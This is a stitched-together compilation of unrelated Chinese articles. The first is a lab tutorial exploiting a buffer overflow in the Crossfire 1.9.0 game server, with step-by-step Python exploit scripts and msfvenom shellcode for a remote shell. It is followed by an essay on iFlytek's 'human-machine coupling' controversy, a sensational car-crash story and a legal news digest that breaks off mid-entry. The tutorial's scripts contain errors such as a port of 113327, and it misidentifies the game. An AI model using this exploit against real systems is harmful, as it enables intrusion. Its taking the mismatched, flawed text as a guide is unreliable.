1.Linux下的缓冲区溢出案例

前面介绍过了Windows下的缓冲区溢出案例，这里再介绍一个Linux下的缓冲区溢出案例。

缓冲区溢出都是指具体的程序，这次要介绍的案例就是crossfire 1.9.0这个游戏，比较喜欢玩游戏的同学对于这个游戏的中文名：穿越火线，应该都很熟悉。

crossfire 1.9.0缓冲区溢出的规律是接受入站 socket 连接时存在缓冲区溢出漏洞。

缓冲区溢出：crossfire 1.9.0

测试准备：1.一台kali的靶机（32位），一台kali的攻击机。

32位是指计算机CPU位数，是指地址总线位数。靶机是不是32位其实都无所谓，但是64位系统的寻址空间为2^64，寻址过大，会提升难度和增加寻址的时间，为了简化操作，所以这里选用32位系统。

在靶机上安装crossfire 1.9.0，安装目录有要求，必须在/usr/games/：

进入/bin文件夹里执行./crossfire就可以启动服务。

检查端口是否打开，执行命令netstat -pan，如果在列表中有端口13327就表明服务正常启动了。

在靶机运行crossfire期间，如果靶机是连上了网络的，网络上如果有人发现了靶机，也是可以对靶机进行攻击的，而且这个漏洞已经被公开好久了，很多人都拿这个漏洞来练习过，所以最好还是做一下处理，避免开放的端口被其他人攻击：

iptables -A INPUT -p tcp --destination-port 13327 \~ -d 127.0.0.1 -j DROP #只有通过本机访问本地网卡的13327
iptables -A INPUT -p tcp --destination-port 4444 \~ -d 127.0.0.1 -j DROP #只有通过本机访问本地网卡4444

然后就需要和上一个案例中一样，查看内存里的EIP了，但是用的工具不同，早期的kali会预装edb-debugger，但是新版本的kali没有在预装这个工具，粗略的找了找，有几个替代品，但是我一时半会也没搞懂怎么用，网上对应的教程也比较少。还是先安装一个edb-debugger使用吧，安装的话最好直接找压缩包传到kali，如果通过网络从github上下载，很难说能不能下载成功。

确认存在缓冲区溢出

edb-debugger安装成功后，调试crossfire的进程，通过执行下面这个命令：

edb --run /usr/games/crossfire/bin/crossfire

界面出来后，记得到debug菜单里点击run两次，这样edb就能运行起来了。

运行起来后，edb-output调试输出窗口显示waitting for connections：

这个程序和一般的溢出不同，它必须发送固定的数据量（4379个字节）才可以发生溢出，而不是大于某个数据量都可以。不清楚最开始的工程师是怎么发现这个特定的数据量的。

写一个脚本验证一下缓冲区溢出：

#!/usr/bin/python3
import socket
host='192.168.0.103'
crash='\x41'*4379 # 4379个'A'
buffer='\x11(setup sound '+crash+'\x90\x00#'
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print('\nSending evil buffer...')
s.connect((host,113327)
data=s.recv(1024)
print(data)
s.send(buffer.encode('utf-8'))
s.close()
print('\nPayload Sent!')

给脚本加权限，然后执行。edb遇到缓冲区溢出时，会有弹窗提示：

看edb里的EIP：

EIP已经被覆盖成0x41414141地址，这个是我们传入的，说明EIP可控，存在溢出。

通过测试增加一个A或者减少一个A发送，会发现后边两个数值都不是A，都不可控，也就是说数据量只有为4379时EIP才完全可控。

精确定位缓冲区溢出

和前一个案例一样，使用pattern_create.rb生成一个4379字节长度的字符串：

用获得的字符串长度，写一个脚本：

#!/usr/bin/python3
import socket
host='192.168.0.103'
crash='Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp'
buffer='\x11(setup sound '+crash+'\x90\x00#'
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print('\nSending evil buffer...')
s.connect((host,113327) 
data=s.recv(1024)
print(data)
s.send(buffer.encode('utf-8'))
s.close()
print('\nPayload Sent!')

检查crossfire服务是否还在运行，edb切换到运行状态。然后执行脚本：

得到 缓冲区溢出时，EIP中内容是46367046，调换一下顺序，在根据ascii码表转换后得到Fp6F，定位在字符串里的位置：

可以看到偏移量是4368，也就是说EIP地址前面有4368个字符。4369，4370，4371，4372的位置存放的是溢出后的EIP地址。

再用脚本验证一下这个结果：

#!/usr/bin/python3
import socket
host='192.168.0.103'
crash='\x41'*4368 + 'B'*4+'C'*7 # 总长度还是要控制在4379个
buffer='\x11(setup sound '+crash+'\x90\x00#'
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print('\nSending evil buffer...')
s.connect((host,113327) 
data=s.recv(1024)
print(data)
s.send(buffer.encode('utf-8'))
s.close()
print('\nPayload Sent!')

执行脚本后，确认EIP中存入的是BBBB的ascii码：

在edb中也可以看到EIP被存入了BBBB：

确认有效的重定向路径

右键ESP，选择 Follow In Dump 查看数据，可以看到ESP寄存器填充了7个C：

因为必须是精确的字节才能溢出，就是说ESP寄存器只能存放7个字节，显然无法在ESP中存放shellcode，需要重新寻找一个寄存器。

几个寄存器都查看后，选择了EAX。因为EAX存放的是我们之前发送的几千个A，是可控的，且有足够的大小存放shellcode。

因为setup sound为服务器指令，所以前十二个字节须先发送setup sound。所以需要让EIP存放EAX的地址，然后在地址上加12，直接从第一个A的位置开始执行。但是各个机器的EAX的地址也各不相同，不具有通用性，所以直接跳转的思路就放弃。

既然ESP不能直接存放shellcode，且只能存放7个字节，那就从ESP跳转EAX并偏移12字节。归纳一下就是从EIP跳到ESP，再从ESP跳到EAX并偏移12字节。

接下来我们要需要将汇编指令转换为十六进制，kali有个预装的工具nasm_shell.rb：

实现跳转只需5个字节，ESP有足够的空间存放这5个字节。

跳转的内容我们用十六进制表示 \x83\xc0\x0c\xff\xe0\x90\x90

\x90：跳转字符,防止被过滤，计算机读入数据顺序与人类阅读顺序相反。

根据上面获取的信息，再写一个脚本：

#!/usr/bin/python3
import socket
host='192.168.0.103'
crash='\x41'*4368 + 'B'*4+'\x83\xc0\x0c\xff\xe0\x90\x90' # 总长度还是要控制在4379个
buffer='\x11(setup sound '+crash+'\x90\x00#'
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print('\nSending evil buffer...')
s.connect((host,113327) 
data=s.recv(1024)
print(data)
s.send(buffer.encode('utf-8'))
s.close()
print('\nPayload Sent!')

执行脚本，EIP还是被4个B覆盖：

右键ESP，点击Follow In Dump，可以看到ESP寄存器被成功覆盖为十六进制的\x83\xc0\x0c\xff\xe0\x90\x90：

转化为汇编语言就是我们的跳转指令jmp eax和add eax,12。

现在已经能从ESP跳转到EAX了，但是我们还不能保证从EIP跳转到ESP，接下来就要完成这个逻辑。

打开edb，菜单栏 Plugins => OpcodeSearcher => OpcodeSearch，然后选择crossfire程序，ESP -> EIP，选择一个jmp esp 的地址，这个地址是不会变的：

这里提一下，靶机要用32位的，否则64位系统这里会出现问题，如下图：

edb的菜单栏 plugin => breakpointmanager => breakpoints 选择add增加我们上边选择的地址的断点用来测试：

测试脚本如下：

#!/usr/bin/python3
import socket
host='192.168.0.103'
crash='\x41'*4368 + '\x96\x45\x13\x08'*4+'\x83\xc0\x0c\xff\xe0\x90\x90' # 总长度还是要控制在4379个
buffer='\x11(setup sound '+crash+'\x90\x00#'
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print('\nSending evil buffer...')
s.connect((host,113327) 
data=s.recv(1024)
print(data)
s.send(buffer.encode('utf-8'))
s.close()
print('\nPayload Sent!')

执行脚本后，会在断点处停留，然后点击F8执行下一步，就会跳转到ESP，然后再点击F8，又会跳转到EAX。到这里我们就确认了有效的重定向路径。

构造shellcode

前面其实还有一步，找出影响shellcode的坏字符，这个完全和上一个案例的操作一致，就不重复了，经过测试坏字符是\x00\x0a\x0d\x20。

现在我们要构造一个有效的shellcode，还是使用kali中的工具msfvenom：

构造攻击脚本：

#!/usr/bin/python3
import socket
host='192.168.0.103'
shellcode= ('\xbf\x99\x24\x9c\x66\xdd\xc5\xd9\x74\x24\xf4\x58\x2b\xc9\xb1'
'\x1f\x31\x78\x15\x83\xe8\xfc\x03\x78\x11\xe2\x6c\x4e\x96\x38'
'\xbf\x54\x51\x27\xec\x29\xcd\xc2\x10\x1e\x97\x9b\xf5\x93\xd8'
'\x0b\xae\x43\x19\x9b\x50\xf2\xf1\xde\x50\xeb\x5d\x56\xb1\x61'
'\x38\x30\x61\x27\x93\x49\x60\x84\xd6\xca\xe7\xcb\x90\xd3\xa9'
'\xbf\x5f\x8c\x97\x40\xa0\x4c\x8f\x2a\xa0\x26\x2a\x22\x43\x87'
'\xfd\xf9\x04\x6d\x3d\x78\xb8\x85\x9a\xc9\xc5\xe0\xe4\x3d\xca'
'\x12\x6d\xde\x0b\xf9\x61\xe0\x6f\xf2\xc9\x9f\xa2\x8b\xac\xa0'
'\x45\x9c\xf5\xa9\x57\x05\xbb\xc0\x27\x35\x76\x94\xcd\xfa\xf0'
'\x97\x32\x1b\xb8\x99\xcc\xdc\xb8\x22\xcd\xdc\xb8\x54\x03\x5c') +
  '\x41'*2868 + '\x96\x45\x13\x08'*4+'\x83\xc0\x0c\xff\xe0\x90\x90' # 总长度还是要控制在4379个
buffer='\x11(setup sound '+shellcode+'\x90\x00#'
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print('\nSending evil buffer...')
s.connect((host,113327) 
data=s.recv(1024)
print(data)
s.send(buffer.encode('utf-8'))
s.close()
print('\nPayload Sent!')

打开攻击机的4444端口，然后执行攻击脚本，攻击机就能获取shell了。

2.“人机耦合”是新模式还是新噱头？

在很多人看来，伴随着人工智能技术的快速发展，AI终有一天会取代同声传译这个职业，而几天前，科大讯飞AI同传造假事件的曝光却给AI同传的发展蒙上了一层阴影。

9月20日，同声传译员Bell Wang在知乎上写了一篇质疑科大讯飞的文章——《科大讯飞，你的AI同传操（qi）作（zha）能更风骚一点吗？》，文章指责科大讯飞在2018创新与新兴产业发展国际会议上所使用的“智能翻译”系统造假，其显示的中文翻译，并不是根据其传感器所采集的声音文件所翻译的，而是由后台两位同传译员临场实时翻译之后，再由机器读出来的。

针对各方的质疑，科大讯飞回应称，“科大讯飞从没讲过AI同传的概念，始终强调是人机耦合的模式”，此次所引发的风波源于在沟通中与同声传译翻译员产生了误会，需要“人机耦合”使用的“语音转写系统”被当作了全自动的“AI离线翻译系统”。那科大讯飞所说的“人机耦合”模式到底是怎样的一种模式？这是人工智能发展的新模式还是一种新噱头呢？

“耦合”与“人机耦合”

在讨论科大讯飞所提出的“人机耦合”模式之前，有必要先厘清“耦合”与“人机耦合”这两个概念，因为这两个概念原本并不是人工智能领域的专有概念。“耦”字的本义是两个人并肩耕作，“耦合”（coupling）这一概念起初是用于物理学领域，指两个或两个以上系统或运动形式通过各种相互作用而彼此影响的机制。

“人机耦合”（Human-Machine Coupling）概念指的是一种控制方法，在机械科学领域，人机耦合将操纵者和机器视为闭环的反馈系统，当机器做出动作后，人根据感觉到的机器状态操纵机器，这时，人的作用可以看成是反馈环节中的一个输入输出系统，输入为人体验到的机器工作状态，输出为根据人的操作目的进行的调整。一定程度上可以说，在“人机耦合”的状态下，机器实际上就成为了人的一部分，目的是更好地实现对于机器的操控。以骑自行车为例，当一个初学者发现行驶方向发生变化时反复地扭动车把，造成前轮的反复扭动，希望以此来使自行车保持稳定的行驶状态，这就是一个简单的人机耦合现象。

“人机耦合”作为真实存在的一种概念，已经被应用在了多种领域之中，但传统意义上的“人机耦合”概念与科大讯飞所提出的“人机耦合”模式是否完全一致呢？这就得看看科大讯飞对于“人机耦合”的解释了。

科大讯飞说的“人机耦合”是什么？

9月25日，科大讯飞在其官方微信平台所发布的一篇题为《真金不怕火炼，科大讯飞没有造假》的文章中指出，早就在2016年的讯飞年度发布会上，科大讯飞董事长刘庆峰就首次提出“人机耦合”的概念，并展望“人和机器的深度耦合将会带来人类的智慧大爆炸”。

在人民网发布的一篇题为《科大讯飞董事长刘庆峰回应AI语音翻译三大质疑》的文章中，刘庆峰介绍，目前AI语音翻译主要包括两种模式：

一是全自动机器翻译。例如，9月17日上海举办的2018人工智能大会上，现场十余位嘉宾的发言只有三位用了人机协作转写同传老师语音的方式，其余均采取全自动机器翻译。

二是人机耦合同传。人机耦合同传又分为两类，一是由机器为同传翻译者提供语音识别和机器翻译的结果，可以提高同传翻译的工作效率、降低同传翻译的工作强度。另一种人机耦合服务模式是机器转写演讲者源语和同传译员的译语，并把两种文字都显示在屏幕上，可以在直播中提供中英文字幕，以及方便没有耳机设备的人看到屏幕上的中英文会议内容。这第二种人机耦合模式便是此次事件中所使用的模式，在这种模式下，机器只是将演讲者和译者的语音转写为文字，而并没有发挥翻译的作用。

通过以上的解释，笔者发现，科大讯飞现阶段的“人机耦合”模式与传统意义上的“人机耦合”概念还是有较大出入的，因为传统意义上的“人机耦合”中人与机器是一体的，人通过操作机器来完成任务，机器是工作的主要执行者，而科大讯飞的“人机耦合”模式中人与机器的联系并没那么紧密，机器更像是人的辅助装置，人才是翻译的主要执行者。而且，有媒体就“人机耦合”的概念采访了北京航空航天大学的刘伟教授，他表示“在人工智能里没有‘人机耦合’一词，但有‘人机融合’”。因此，科大讯飞使用了“人机耦合”这样的说法，的确让人疑惑，这看起来更像是科大讯飞自造的一个噱头。

“人机耦合”或许是一个发展前景

就“耦合”二字的字面意思，除去物理解释，刘伟教授认为应该被解释成“完美结合”。因此笔者觉得虽然科大讯飞现阶段的“人机耦合”同传模式与人们所期待的人工智能同传模式差距很大，但“人机耦合”或许可以看是未来同声传译的一个发展前景，即人和机器的完美结合。

其实机器翻译的雏形最早可以追溯到1933年，一位苏联科学家利用卡片、打字机和旧式胶片相机发明了一个简易的机械式翻译器，但是机器翻译发展到今天依然在翻译的准确度和流畅度方面存在着诸多的问题，这主要和机器翻译的原理有关。

当前使用的机器翻译模式有两种，即统计机器翻译和神经机器翻译。神经机器翻译是对整句话进行编解码实现翻译，所以它在处理长句时的表现十分出色，但由于其独特的工作原理，到今天仍会出现漏译的问题，这是统计机器翻译，甚至基础的基于规则的机器翻译不会犯的错。而统计机器翻译是把将单个短语进行翻译，再将翻译好的短语组成一句尽可能通顺的话，统计机器翻译强调两种语言中词汇的对应关系，因此这种模式虽然能忠实保留原文的内容，但是输出的长句不够又通顺。

另一方面，当今机器翻译最大的一个特点是它并不理解文本的意思，自然语言数据和其他数据对机器来说没有本质上的区别。而且，机器翻译并不能通过对语境的理解来改善自己的输出，这时候就需要人的介入。

当前人工智能技术依旧处于发展初期，完全依靠人工智能进行工作的时代还很遥远，而推动人与机器的完美结合不失为现阶段下的一个发展方向，尤其是在翻译领域，以便更好地实现翻译“信、达、雅”的要求。

参考资料：

1. 闫超. 基于耦合理论的高技术产业金融供给侧改革研究[D].中国科学技术大学,2016.

2. 科大讯飞欲借“人机耦合”洗脱AI同传造假嫌疑，专家说没有这个词

https://mp.weixin.qq.com/s/Bc8Z8xm0MJokC0bANS52ug

3. 外语专业学生会被机器抢走饭碗吗？——写在AI同传风波之后丨语言学午餐

https://mp.weixin.qq.com/s/Vbe9KEi8eRjnwZww5pxYGg

4. 重建巴别塔，机器翻译的前世今生丨语言学午餐

https://mp.weixin.qq.com/s/yHAvZX5njvNiMkZj3Eo7Hg

5. 科大讯飞的“人机耦合说”真的说清楚了吗？背后究竟隐藏了什么？

https://mp.weixin.qq.com/s/H9b-WjCC6eBmQ6VpIUm05A

6. 真金不怕火炼，科大讯飞没有造假

https://mp.weixin.qq.com/s/KSf2Ieftw_hAzdhNE72HTg

7. 科大讯飞董事长刘庆峰回应AI语音翻译三大质疑

http://scitech.people.com.cn/GB/n1/2018/0922/c1007-30309109.html

作者：余春生

版权所有，转载请联系滚球君

3.毁灭性车祸！女司机误将油门当刹车，楼房变废墟！

一场车祸，震惊了浙江的一座小城。事故发生在一个晴朗的下午，一辆白色轿车猛然冲向一栋楼房，场面十分惨烈。

据目击者称，这是一位女司机驾驶的车辆。不知何故，她竟将油门当成了刹车，结果车辆以惊人的速度加速冲进了楼房。当时，楼房内有一家小吃店正在营业，顾客们被突如其来的撞击吓得七手八脚地逃离现场。

车辆砸进楼房的一瞬间，整个场景变得一片混乱。碎玻璃、瓦砾四处飞溅，尖叫声和惊恐的呼喊声此起彼伏。现场顿时乱成了一锅粥。

楼房外，路人纷纷报警求助。警察、消防队员和救护人员迅速赶到现场展开救援工作。他们紧急疏散周围群众，确保安全。同时，消防队员用铁锹、破拆工具等装备，努力营救被困的人员

。

经过艰苦努力，救援人员终于将被困人员救出。然而，现场的情景让人痛心。楼房已经严重倾斜，墙壁坍塌，废墟上散落着被撞毁的家具和残破的玻璃。车辆也变得面目全非，车头完全变形，冒着滚滚黑烟。

救援人员立即展开紧急救治，将伤者迅速送往医院。医院内，医护人员全力以赴进行抢救。伤者们面容痛苦，有的流着鲜血，有的双腿受伤，有的失去了意识。

事故发生后，该女司机被警方带走接受调查。初步调查显示，司机疏忽大意，对车辆使用不当，才导致了这场惨剧。她对自己的错误深感痛悔，表示愿意承担一切后果。

这场车祸给这座小城带来了巨大的震撼和伤痛。人们纷纷表示对受伤者的关切和祝福，呼吁大家在驾驶中要倍加小心，确保交通安全。

这起车祸的发生再次提醒我们，驾驶是一项极其重要的任务，我们不能掉以轻心。希望这样的悲剧不再发生，让我们共同呼吁，珍爱生命，守护人民幸福与安全。

4.法律研究资讯（2022.09.13-2022.09.18）

新规动态

01 《中华人民共和国网络安全法（征求意见稿）》公开征求意见

2022年9月12日，国家互联网信息办公室发布《关于修改〈中华人民共和国网络安全法〉的决定（征求意见稿）》（下称“《征求意见稿》”），向社会公开征求意见。意见反馈截止时间为2022年9月29日。

《征求意见稿》共六条，主要在违反网络运行安全一般规定的法律责任制度、关键信息基础设施安全保护的法律责任制度、网络信息安全法律责任制度和个人信息保护法律责任制度方面对《中华人民共和国网络安全法》作出了修改。

来源：

网信中国：《关于公开征求<关于修改《中华人民共和国网络安全法》的决定（征求意见稿）>意见的通知》，载“网信中国”微信公众号，2022年9月14日，https://mp.weixin.qq.com/s/67z5M65tBCVGqbaDC7qJjw。

02 国标《网络数据分类分级要求》公开征求意见

2022年9月14日，国家市场监督管理总局、国家标准化管理委员会发布了国标《网络数据分类分级要求》征求意见稿（下称“《征求意见稿》”）。

《征求意见稿》旨在支撑《中华人民共和国数据安全法》第二十一条提出的数据分类分级保护制度的贯彻落实，解决由于缺乏国家统一的数据分类分级规则，导致相关国家数据安全制度、数据分类分级保护要求不易落地的问题。《征求意见稿》给出了数据分类分级基本原则、数据分类方法、数据分级框架和数据定级方法等。

来源：

数据合规权威平台：《国标<网络数据分类分级要求>征求意见》，载“ 数据法盟”微信公众号，2022年9月15日，https://mp.weixin.qq.com/s/YbE11rKaej-lxJ0_eFdJjQ。

执法动态

03 欧盟法院对谷歌的反垄断罚款降至41.25亿欧元

9月14日，欧洲第二高等法院（欧盟普通法院）对谷歌Android反垄断上诉案做出了裁决，认定谷歌在移动搜索市场滥用其市场主导地位，但将罚款金额从之前的43.4亿欧元降至41.25亿欧元。

本案主要争议事实是，自2011年以来，谷歌凭借其在互联网搜索市场的主导地位，对Android设备厂商和移动运营商做出了一些非法限制。2018年7月，欧盟委员会宣布对谷歌处以43.4亿欧元（当时约合51.5亿美元）的反垄断罚款。随后，谷歌对欧盟的该裁决提起上诉。2021年9月，欧盟普通法院对该案进行了开庭审理，为期五天。2022年9月14日，欧盟普通法院法官公布了罚款41.25亿欧元的裁决结果。

来源：

